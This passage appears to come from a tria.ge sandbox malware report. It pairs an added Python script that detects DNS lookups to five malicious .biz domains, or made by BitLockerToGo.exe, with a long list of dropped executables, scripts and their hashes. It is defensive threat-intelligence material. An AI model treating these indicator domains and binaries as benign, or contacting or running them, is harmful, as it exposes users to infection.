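The network table attributes every DNS lookup to BitLockerToGo.exe and lists the names it queried. The script below, added here as an example and not part of the tria.ge report, turns that observation into detection logic over Sysmon Event ID 22 (DnsQuery) records: it flags any query for one of the report's domains (or a subdomain of one) and any DnsQuery event whose Image is BitLockerToGo.exe regardless of domain. The key=value log layout, the sample lines, the Image paths and the assumption that BitLockerToGo.exe never legitimately resolves external names are all constructed for the example.

```python
"""Detection over Sysmon Event ID 22 (DnsQuery) records, built from the
network table above.  Added example; the log lines and their key=value
layout are constructed, not taken from the tria.ge report."""
import re
from dataclasses import dataclass

# Domains queried in the report's network table (report data).
IOC_DOMAINS = {
    "suggestyuoz.biz",
    "hoursuhouy.biz",
    "mixedrecipew.biz",
    "affordtempyo.biz",
    "pleasedcfrown.biz",
}

# The report attributes every lookup to BitLockerToGo.exe.  Assumption for
# this example: on a healthy host that binary does not resolve external names,
# so any DnsQuery event from it is a hit even when the domain is benign
# (steamcommunity.com in the report).
SUSPECT_IMAGES = {"bitlockertogo.exe"}

# Constructed record layout: one event per line, unquoted key=value pairs,
# values without spaces.
KV = re.compile(r"(\w+)=(\S+)")


@dataclass
class Hit:
    reason: str      # "ioc-domain" or "unexpected-resolver"
    image: str       # basename of the querying process, lower-cased
    query: str       # queried name, lower-cased, trailing dot stripped
    line_no: int     # 1-based index into the input


def parse_event(line: str) -> dict:
    """Turn 'EventID=22 Image=... QueryName=...' into a dict."""
    return dict(KV.findall(line))


def matches_ioc(name: str) -> bool:
    """True for an IOC domain or any subdomain of one."""
    return any(name == d or name.endswith("." + d) for d in IOC_DOMAINS)


def detect(lines) -> list:
    """Return one Hit per suspicious DnsQuery record, in input order."""
    hits = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        if ev.get("EventID") != "22":
            continue                      # only DnsQuery events are relevant
        image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        query = ev.get("QueryName", "").lower().rstrip(".")
        if matches_ioc(query):
            hits.append(Hit("ioc-domain", image, query, n))
        elif image in SUSPECT_IMAGES:
            hits.append(Hit("unexpected-resolver", image, query, n))
    return hits


# Constructed sample log (not from the report).  Line 4 is a process-creation
# event and must be ignored; line 5 uses a subdomain and a trailing dot.
SAMPLE_LOG = [
    "EventID=22 Image=C:\\Windows\\System32\\svchost.exe QueryName=ctldl.windowsupdate.com",
    "EventID=22 Image=C:\\Windows\\BitLockerDiscoveryVolumeContents\\BitLockerToGo.exe QueryName=hoursuhouy.biz",
    "EventID=22 Image=C:\\Windows\\BitLockerDiscoveryVolumeContents\\BitLockerToGo.exe QueryName=steamcommunity.com",
    "EventID=1 Image=C:\\Windows\\BitLockerDiscoveryVolumeContents\\BitLockerToGo.exe CommandLine=BitLockerToGo.exe",
    "EventID=22 Image=C:\\Users\\Admin\\AppData\\Local\\Temp\\random.exe QueryName=www.mixedrecipew.biz.",
]

if __name__ == "__main__":
    for h in detect(SAMPLE_LOG):
        print(f"line {h.line_no}: {h.reason:20s} {h.image} -> {h.query}")
```

Suffix matching on the domain list is deliberate: the report shows bare second-level names, and a later variant that prefixes a host label should still fire. The second rule is the more durable one, since the .biz names rotate while the choice of BitLockerToGo.exe as the querying process is what stands out on the page.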
MITRE ATT&CK Enterprise v15

                                                                                            Downloads

                                                                                            • C:\ProgramData\JKEGIDGDGHCAAAAKKFCG

                                                                                              Filesize

                                                                                              9KB

                                                                                              MD5

                                                                                              0358b88846c062130d9bfabdde97b4f7

                                                                                              SHA1

                                                                                              e075398275a9ed7859885c5ead3ecf45ec437212

                                                                                              SHA256

                                                                                              6d9ba480a8cba925ce303b81e12b0b729b694e445dd59dfd4ae78fb9344d64ab

                                                                                              SHA512

                                                                                              bfdbd6e334c226f9937ad30772305df98931767c7b46b65ea8e5e8f3a6528de449a125440bb9947be63b967cfdfabaea36f66d5dc4cc3cbe88e7dc1690d6fa6f

                                                                                            • C:\ProgramData\mozglue.dll

                                                                                              Filesize

                                                                                              593KB

                                                                                              MD5

                                                                                              c8fd9be83bc728cc04beffafc2907fe9

                                                                                              SHA1

                                                                                              95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                              SHA256

                                                                                              ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                              SHA512

                                                                                              fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                            • C:\Temp\NcQpdvRJC.hta

                                                                                              Filesize

                                                                                              782B

                                                                                              MD5

                                                                                              16d76e35baeb05bc069a12dce9da83f9

                                                                                              SHA1

                                                                                              f419fd74265369666595c7ce7823ef75b40b2768

                                                                                              SHA256

                                                                                              456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7

                                                                                              SHA512

                                                                                              4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

                                                                                            • C:\Users\Admin:.repos

                                                                                              Filesize

                                                                                              1.2MB

                                                                                              MD5

                                                                                              33111cbf906e5247160ebff6df5800ed

                                                                                              SHA1

                                                                                              c5faf84561a8badbd50e6b93c101ad78854c77b7

                                                                                              SHA256

                                                                                              2566452848517efd6c6def977a69bd27b36c7c1bd6024ea140a88a3415c48b7b

                                                                                              SHA512

                                                                                              5e751c938f6a7022a379fe04f770defe969cc0323a3e2921639d8f38c3f130f39be6c61efd596710d004c2133eabdf9ef5725e19ac97ca2053159f1d1217b1e6

                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                              Filesize

                                                                                              40B

                                                                                              MD5

                                                                                              bd91c0f22d990f53b9f7cb0702985f50

                                                                                              SHA1

                                                                                              276b3c7852a75182cbc21d8e8406832ec7ec72f4

                                                                                              SHA256

                                                                                              f710a6f822b0eee3d2b75844dec5ad14a84f1a9560fd2dfe2293bd8af5df64ab

                                                                                              SHA512

                                                                                              adcc09d91dec4e4115c1ca0b8bec0e8e718691c45e001747b84da1d4ef2e4f3cad2e97675606053b663c83c862eec4ec8c750ffbc8e77b8f646a832853a18e1e

                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                              Filesize

                                                                                              2B

                                                                                              MD5

                                                                                              d751713988987e9331980363e24189ce

                                                                                              SHA1

                                                                                              97d170e1550eee4afc0af065b78cda302a97674c

                                                                                              SHA256

                                                                                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                              SHA512

                                                                                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                              Filesize

                                                                                              2KB

                                                                                              MD5

                                                                                              25604a2821749d30ca35877a7669dff9

                                                                                              SHA1

                                                                                              49c624275363c7b6768452db6868f8100aa967be

                                                                                              SHA256

                                                                                              7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

                                                                                              SHA512

                                                                                              206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

                                                                                              Filesize

                                                                                              284B

                                                                                              MD5

                                                                                              d200dd1100a44a5a3b12e7d29db8b7b2

                                                                                              SHA1

                                                                                              7f05798377bc047665414fa546c6030329a6ec04

                                                                                              SHA256

                                                                                              4f42727c37bb36f3000fc7f75b92b83373c9a0ae50877d823fec210a92ba366c

                                                                                              SHA512

                                                                                              84c4d92cfa53a233e9df22d3e00e6b81c8f5acf5e680ece10d5620536982dc9fefbb8bd860cf85086e007f0a2674d5233222940b3bf04114ff474cb75e50eac7

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

                                                                                              Filesize

                                                                                              418B

                                                                                              MD5

                                                                                              a48d6e0902306571ba718dd8a19241a4

                                                                                              SHA1

                                                                                              7fbd78565fc643ec8b4a4151eff2870f0268219e

                                                                                              SHA256

                                                                                              253da8a8b990ca940b1d265b3a82f2ce3ea1a8b5aa43204894be16c7e5db85f0

                                                                                              SHA512

                                                                                              c5a2c811ed113d4220d7e5f3423e5e70de737c13bb375349a5cb8753bef9a282474ccf689d656fd45e875b58fc9f3a2fc1ce7c34d433dc5f96cace835d6eb74c

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\5de63687-c391-4c74-bdd2-13288f489e20.dmp

                                                                                              Filesize

                                                                                              825KB

                                                                                              MD5

                                                                                              cd17ca4bbf77bee8e096ab646e873780

                                                                                              SHA1

                                                                                              04ca6634a033aa522abf8a8efb662183bd01ba35

                                                                                              SHA256

                                                                                              6b06abcb00c9a28bddcfa7081a77241ceb312aaa7452ac43d103b7d89d0ca256

                                                                                              SHA512

                                                                                              acbf175aa70527c1cab3624b6bbe30f9ca5ec61db194ab87b9e2baca63ca26b7e423dfd1a3af438ee5b01b980fa4385d1fa151f4a1a859f975fc8b6213e7041e

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\62c431bc-5ee2-4857-8591-8f3d4aa25137.dmp

                                                                                              Filesize

                                                                                              834KB

                                                                                              MD5

                                                                                              a4f9d260703fd5d222c4bf14412f719e

                                                                                              SHA1

                                                                                              065c7cb0ed6ee881c6c04f2ee0090853a215f70b

                                                                                              SHA256

                                                                                              361fafdcb6876d9dc590130a18d924ff8ff16be5c0daf7d64ea1699376d48427

                                                                                              SHA512

                                                                                              8a77a57cd67d2daf84f23856d5312014fa0364a27097e0087bca157c8b96bbb318c84da5dd93a2929f938833ab105fbad1f09d02b29baf30390b14616446dc28

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\9c1f5f14-7ef5-4a10-ae7f-d1e04a45cb4e.dmp

                                                                                              Filesize

                                                                                              834KB

                                                                                              MD5

                                                                                              3cdc2b3a32bd127b3baa57bebb3afa91

                                                                                              SHA1

                                                                                              ae8b6d3b611dbb57ca8b4931cce08f4375583b0d

                                                                                              SHA256

                                                                                              214083b9337675aec69a9a23153a92ae52f69edee437ee19b74e402769db5bfc

                                                                                              SHA512

                                                                                              58ef7f2a83bc801ed8db0959ac952206c12a0df9467106a5c800d17ec47b6f14b08d2579d12853deaa9a8bb3aaa8dd8d0728ab715418f2eb4148ff55fc51a3de

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\d128e5c5-72fc-4278-987c-29b82d60ecc6.dmp

                                                                                              Filesize

                                                                                              817KB

                                                                                              MD5

                                                                                              93f78d4a3a39edd0cfcbe7a0e298af13

                                                                                              SHA1

                                                                                              71ca12fb89c2c70f0f5feb6690d093140777aed7

                                                                                              SHA256

                                                                                              cb74abffb272a583b8533af4cf9fa1d4c0cd1140355db2fd5040945846de3832

                                                                                              SHA512

                                                                                              ab6862bf0a20e48e365bb36982075b017a3a712d70b4082671dfe6e7c2c49473ef39e168ac28bfa26c7a1181ac139c2d866324587f1445c9ac69753f6ca145b7

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\e5053316-3772-41d4-9410-91f53806a35c.dmp

                                                                                              Filesize

                                                                                              825KB

                                                                                              MD5

                                                                                              357c68c51f6d8a54a04f2a8c55f4aebb

                                                                                              SHA1

                                                                                              7160ac5f74954af4b0994dcd40d4f407b174c6ed

                                                                                              SHA256

                                                                                              a3eed12a0777f3a534cb83c84e50de3ff691cb3d3674dd3198b919051e89ebef

                                                                                              SHA512

                                                                                              f81b918eca8d3269033b441a8147076503be6094a1c77665a15675f94edf9ca7528ff1d9c8d05215799bd1be6ffce0e5134baa94e4713d8fac5868d707a23f66

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                              Filesize

                                                                                              152B

                                                                                              MD5

                                                                                              a4852fc46a00b2fbd09817fcd179715d

                                                                                              SHA1

                                                                                              b5233a493ea793f7e810e578fe415a96e8298a3c

                                                                                              SHA256

                                                                                              6cbb88dea372a5b15d661e78a983b0c46f7ae4d72416978814a17aa65a73079f

                                                                                              SHA512

                                                                                              38972cf90f5ca9286761280fcf8aa375f316eb59733466375f8ba055ce84b6c54e2297bad9a4212374c860898517e5a0c69343190fc4753aafc904557c1ea6dc

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                              Filesize

                                                                                              152B

                                                                                              MD5

                                                                                              0d6b4373e059c5b1fc25b68e6d990827

                                                                                              SHA1

                                                                                              b924e33d05263bffdff75d218043eed370108161

                                                                                              SHA256

                                                                                              fafcaeb410690fcf64fd35de54150c2f9f45b96de55812309c762e0a336b4aa2

                                                                                              SHA512

                                                                                              9bffd6911c9071dd70bc4366655f2370e754274f11c2e92a9ac2f760f316174a0af4e01ddb6f071816fdcad4bb00ff49915fb18fde7ee2dabb953a29e87d29e4

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                              Filesize

                                                                                              152B

                                                                                              MD5

                                                                                              7cf371a5eacec9cb77c3cf98ce54b8aa

                                                                                              SHA1

                                                                                              8f83d1a5e902862e1afd57e70b0e65dce3272931

                                                                                              SHA256

                                                                                              bef2b49f8c642fba7b7ecde40edd8fbf39d0ed8ff92d15f4d19745242cf75965

                                                                                              SHA512

                                                                                              a4adc985f1e6d01b9e3b61bd58da56f2f45d36a6c6278ad9f603a5b51ab048c9636862837fb05c8f60865e17714e079a5b9b176b49fc2e887f998d6d5e4d70f2

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                              Filesize

                                                                                              152B

                                                                                              MD5

                                                                                              2ee9e9353f13e114e83bd93805819a50

                                                                                              SHA1

                                                                                              7b009f0c7e2cbf7b2c2e98473086324aff354a94

                                                                                              SHA256

                                                                                              914822c7ea56453078681afe0e144d50ad144ba0dd6128313446c43d7f5845cf

                                                                                              SHA512

                                                                                              8cc7a684476bc01002c30a6262c9cc4b0f2be1d6ac140776fb871d0135c794854f209403a7e15b4056c9000b336e5f76269423be4ebe1c12e57530c1a70768ed

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\965502b0-761d-460e-9416-de2e5e68cc12.tmp

                                                                                              Filesize

                                                                                              1B

                                                                                              MD5

                                                                                              5058f1af8388633f609cadb75a75dc9d

                                                                                              SHA1

                                                                                              3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                              SHA256

                                                                                              cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                              SHA512

                                                                                              0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                              Filesize

                                                                                              6KB

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

                                                                                              Filesize

                                                                                              264KB

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZWLN2AM0\service[1].htm

                                                                                              Filesize

                                                                                              1B

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                              Filesize

                                                                                              53KB

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              16KB

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              16KB

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              16KB

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              16KB

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              16KB

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              16KB

                                                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\activity-stream.discovery_stream.json

                                                                                              Filesize

                                                                                              28KB

                                                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\activity-stream.discovery_stream.json.tmp

                                                                                              Filesize

                                                                                              21KB

                                                                                            • C:\Users\Admin\AppData\Local\TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE

                                                                                              Filesize

                                                                                              1.6MB

                                                                                            • C:\Users\Admin\AppData\Local\TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE

                                                                                              Filesize

                                                                                              2.0MB

                                                                                            • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe

                                                                                              Filesize

                                                                                              19.4MB

                                                                                            • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe

                                                                                              Filesize

                                                                                              350KB

                                                                                            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe

                                                                                              Filesize

                                                                                              345KB

                                                                                            • C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe

                                                                                              Filesize

                                                                                              348KB

                                                                                            • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe

                                                                                              Filesize

                                                                                              680KB

                                                                                            • C:\Users\Admin\AppData\Local\Temp\10009000101\4c708b9de9.exe

                                                                                              Filesize

                                                                                              3.8MB

                                                                                            • C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe

                                                                                              Filesize

                                                                                              1.7MB

                                                                                            • C:\Users\Admin\AppData\Local\Temp\1088414001\8827e2f2e3.exe

                                                                                              Filesize

                                                                                              2.0MB

                                                                                            • C:\Users\Admin\AppData\Local\Temp\1088415101\e4c9d2bfff.exe

                                                                                              Filesize

                                                                                              938KB

• C:\Users\Admin\AppData\Local\Temp\1088416021\am_no.cmd
  Filesize: 2KB
  MD5: 189e4eefd73896e80f64b8ef8f73fef0
  SHA1: efab18a8e2a33593049775958b05b95b0bb7d8e4
  SHA256: 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
  SHA512: be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

• C:\Users\Admin\AppData\Local\Temp\1088417001\0f807048bd.exe
  Filesize: 1.7MB
  MD5: f662cb18e04cc62863751b672570bd7d
  SHA1: 1630d460c4ca5061d1d10ecdfd9a3c7d85b30896
  SHA256: 1e9ff1fc659f304a408cff60895ef815d0a9d669a3d462e0046f55c8c6feafc2
  SHA512: ce51435c8fb272e40c323f03e8bb6dfa92d89c97bf1e26dc960b7cab6642c2e4bc4804660d0adac61e3b77c46bca056f6d53bedabcbeb3be5b6151bf61cee8f4

• C:\Users\Admin\AppData\Local\Temp\1088418001\18b64e1917.exe
  Filesize: 1.7MB
  MD5: 8789b92ffeca8ee656a940c8be47bf3c
  SHA1: 74cc3e433ae4feeb2721c8576905742acb37898f
  SHA256: 86427ba98b5815c5037b45a09947f2a24e6334895ad4a6edf4fa6cc4d6ff8b33
  SHA512: c69298bb46da5ba57afa43f7ca7f0f9acc8318207ffbf32d02bc70a99d3231c816ed4536c5557e29d1f8de45ebbed222a88c190c1b18b670342cf614b32af1fe

• C:\Users\Admin\AppData\Local\Temp\1088419001\90ced29b15.exe
  Filesize: 6.2MB
  MD5: 8fe5086b3ad7a3b18df23609fdb0a2af
  SHA1: 468e1852938ba8a8716c9679a07cfb5efa11104f
  SHA256: cd65a998ba49723b195eaf386a7c7e7cfc3e7be59231c5031ace22c9e1f49437
  SHA512: dadfe66a9b30d3e180e8e6177faabe1557f27afaa0877457bea4656e7af0521d2ff2325964f8ee531f8069852461fcce93b1bc38aa0439b6afa964b9a50bb677

• C:\Users\Admin\AppData\Local\Temp\1088420001\40e0b6ad21.exe
  Filesize: 2.0MB
  MD5: b1ef388172ed5f3cc2fe9ffd9a38faff
  SHA1: 7548b7c462d078f0082bf7e899d6a65f793a55f6
  SHA256: 279e4dde9af12d6cd9f222cfdea10b0b5b84b78a8f3996a3dada73b3660e3ada
  SHA512: b26ff7ee5969f7921ee8962651cb411aa95d1d9ad43c759403549127c160df7032522f23e09f74be7ee5a3eb494f85042b2b2016c26d37aedbc47d0b2fc78148

• C:\Users\Admin\AppData\Local\Temp\1088421001\d2YQIJa.exe
  Filesize: 2.0MB
  MD5: a6fb59a11bd7f2fa8008847ebe9389de
  SHA1: b525ced45f9d2a0664f0823178e0ea973dd95a8f
  SHA256: 01c4b72f4deaa634023dbc20a083923657e578651ef1147991417c26e8fae316
  SHA512: f6d302afa1596397a04b14e7f8d843651bd72df23ee119b494144c828fa371497f043534f60ae5908bc061b593132617264b9d1ea4735dccd971abb135b74c43

• C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe
  Filesize: 679KB
  MD5: 2107ebf930fe9a3c256e14c3c963963a
  SHA1: d44730b0449ce3fcfabf6af4c0e4a7215f072957
  SHA256: 5fa95c813f509528d79b1dc0d5f6e74a17ec6ffdbec44eafcf255691ecda3db6
  SHA512: d7c668220f366d024b397cc747e6c4db4dd04e02ef4f673e66e810a4bb61d694f99a861f108cddb92fbfb573100581e8d1f763e2e90d9af79464ab16f4846baf

• C:\Users\Admin\AppData\Local\Temp\1088423001\oKUl4yo.exe
  Filesize: 162B
  MD5: 1b7c22a214949975556626d7217e9a39
  SHA1: d01c97e2944166ed23e47e4a62ff471ab8fa031f
  SHA256: 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
  SHA512: ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

• C:\Users\Admin\AppData\Local\Temp\1088424001\7aencsM.exe
  Filesize: 272KB
  MD5: e2292dbabd3896daeec0ade2ba7f2fba
  SHA1: e50fa91386758d0bbc8e2dc160e4e89ad394fcab
  SHA256: 5a933f763d60fae9b38b88a77cf4636d633e4b25d45fc191281e55ab98214d8a
  SHA512: d4b8f612b448326edca08f3652d8973c08272274c1e4d85086a6cf23443475ad891b051f5bbf054cc1e2317f4378cde6899315ac22c60defd3791f3b04bee221

• C:\Users\Admin\AppData\Local\Temp\1088426041\tYliuwV.ps1
  Filesize: 881KB
  MD5: 2b6ab9752e0a268f3d90f1f985541b43
  SHA1: 49e5dfd9b9672bb98f7ffc740af22833bd0eb680
  SHA256: da3b1ac39de4a77b643a4e1c03fc793bad1b66bfd8624630de173004857972df
  SHA512: 130879c67bfcea3a9fe553342f672d70409fe3db8466c3a28ba98400b04243ebf790b2cf7e4d08ca3034fd370d884f9cbdd31de6b5309e9e6a4364d3152b3ace

• C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe
  Filesize: 653KB
  MD5: ef1a41879a5f0af1ab0f33b95234c541
  SHA1: 949047d760a5264efe2926d713ca0ec7de73a32d
  SHA256: 9222b086086107816a343f4bdf8a9325fa4b3de8ac5a91fb841408dc6232e5a8
  SHA512: d0ef0ab5f808f549a0dba055a1f39727632026de0fcb5c2fa258e54769dbbc5b8e6775e5b0a7fe98e29ec33dedae3f4c85cda6d66b492938b581c4ba7f34e30b

• C:\Users\Admin\AppData\Local\Temp\1088432001\198cfc7201.exe
  Filesize: 2.0MB
  MD5: 4bf8fcb2ba32524e8f602c544a115255
  SHA1: c0e5f5da5ef97269666d75a1f8451e2b8fb9d50a
  SHA256: 0301396482962a0423dfc90c16efdfa6f8b301ecf51b7e218c04a9cd2e0075ec
  SHA512: 00b646dfbd2aa4b824005416a06fa3e9e167215f41431d738bc1dde7a88aa26a76d817079aee8c57566d40c648bfdcbb72fde2d64c0b7575cda37acd5728474d

• C:\Users\Admin\AppData\Local\Temp\1088433001\ymy1CwP.exe
  Filesize: 243KB
  MD5: b73ecb016b35d5b7acb91125924525e5
  SHA1: 37fe45c0a85900d869a41f996dd19949f78c4ec4
  SHA256: b3982e67820abc7b41818a7236232ce6de92689b76b6f152fab9ef302528566d
  SHA512: 0bea9890dbcd3afd2889d0e7c0f2746995169e7b424f58d4998c50bc49d2b37d30f5bd1845d3079b25f9963af2b71f136719cbd9fda37f7b85874992096b3e1d

• C:\Users\Admin\AppData\Local\Temp\1088435001\6ccbdd7074.exe
  Filesize: 1.8MB
  MD5: f1c920b0ed3e83ab893c52e76fd6c7eb
  SHA1: 3e0a8b7cc6f665d2b378304f1b912de5aae30ca0
  SHA256: f07587a1cdf2cd36e2fca732234741363900e86738d454edaabf85ce34bf37cc
  SHA512: f805738b361d34d9d6fd301c6386e13b439a50f2ea462b7f91060a389da60c7f84a6f556dfc96ce3c1a47ac24b423b9577e3da18c034165634865ccd75e1bb8d

• C:\Users\Admin\AppData\Local\Temp\1088436001\ee1401f004.exe
  Filesize: 1.7MB
  MD5: 564c1f328f441903faa8cdc27a98422c
  SHA1: 954d2746bdcbfd0f68adc3dcccaf25883a18dc08
  SHA256: 8a38d1a35a3cf7a0f06e18c8ea0dddafd48cf1560db03cf9dfd86a1cc7f2c1bf
  SHA512: d0668720f1db09d242ac0e35e464bc2f08d2f026d740ce2b491fdaa940c2df8c2d5aecd75fe9d3c4ac2aba0a548faad423143ace635637784c3767c9dd4b40de

• C:\Users\Admin\AppData\Local\Temp\1088437001\dd8dbe5ac0.exe
  Filesize: 949KB
  MD5: e7531a90b89726528faf86d903480827
  SHA1: 00a355aff9eb53bfd9fa2445417993e42c83246c
  SHA256: 6f9f435f2de3c79a2f1f0ad79a511b217036f2118a7e05d780cb5e7314209305
  SHA512: f04aaad6fd0a375ee63f9135532ae4344c0f12871efa74e16c7809dc670a86800547557f66aa929f6b6fafa602f2243eac62f0f81fdf0dfed1679054a85ede9b

• C:\Users\Admin\AppData\Local\Temp\1088438001\0f8ce684d7.exe
  Filesize: 938KB
  MD5: 12fa7934048036951a771627ac9528d8
  SHA1: a6cee27c091bc5c670fcfd485cade01cb5f75521
  SHA256: 6bc46c42c5611f6381c5d1eeea023577146636efb3c9dd1273d756d4bc425306
  SHA512: 41403d9755ada53ac1e28fa3f8f365c0de29581a3b61f030ec0ae19bcd59b0e65802a6ec7587affb39c572923cf2572553384ebc54a657d9d5b9d40f73807a0f

• C:\Users\Admin\AppData\Local\Temp\1088439001\amnew.exe
  Filesize: 429KB
  MD5: 22892b8303fa56f4b584a04c09d508d8
  SHA1: e1d65daaf338663006014f7d86eea5aebf142134
  SHA256: 87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f
  SHA512: 852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

• C:\Users\Admin\AppData\Local\Temp\1088440001\f613a12ef8.exe
  Filesize: 9.8MB
  MD5: db3632ef37d9e27dfa2fd76f320540ca
  SHA1: f894b26a6910e1eb53b1891c651754a2b28ddd86
  SHA256: 0513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d
  SHA512: 4490b25598707577f0b1ba1f0fbe52556f752b591c433117d0f94ce386e86e101527b3d1f9982d6e097e1fcb724325fdd1837cc51d94c6b5704fd8df244648fd

• C:\Users\Admin\AppData\Local\Temp\1088441001\c6a31d1295.exe
  Filesize: 325KB
  MD5: f071beebff0bcff843395dc61a8d53c8
  SHA1: 82444a2bba58b07cb8e74a28b4b0f715500749b2
  SHA256: 0d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec
  SHA512: 1ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d

• C:\Users\Admin\AppData\Local\Temp\1088442001\0519cf3c64.exe
  Filesize: 4.5MB
  MD5: be62ae2dee7394421b983665198c14fd
  SHA1: 842ab6b2bd731283e083a343d1a305644b93f62d
  SHA256: 5e17ee28594e73724b3db603d2f0e8274a06cdd031742843f6039fe827bce2c9
  SHA512: 460cf4783d851ef37029fc941a8707aee16047f5a9a8544b3ee8acc5d4bd51fca71c44e401a0988e5f1efa4baee5f7dea628f52feea89c6c6448c06ab1754600

• C:\Users\Admin\AppData\Local\Temp\4etjqgqsj.hta
  Filesize: 726B
  MD5: 55739737e7b0f2ec26547d6243962205
  SHA1: c586677120674d11aedd777f0c5533b9fdc189fa
  SHA256: 3d765b50db1017fb8979f5c41885668b039fc0b701774b14abe47042fd36243a
  SHA512: 6cb96fec789b355beb082ab48fead686ae93012f210a09b687db47d70579501692c14f6bd61ac99908dd9592817b63ea9758fef1789db6e9d92b462dd125a0dc

• C:\Users\Admin\AppData\Local\Temp\5ohpgXHlP.hta
  Filesize: 720B
  MD5: e6e78f585f52720e1800faf2d60ae272
  SHA1: 8bb8bdd6dcb3a8a61ef9b4ec81a12095b18f3c82
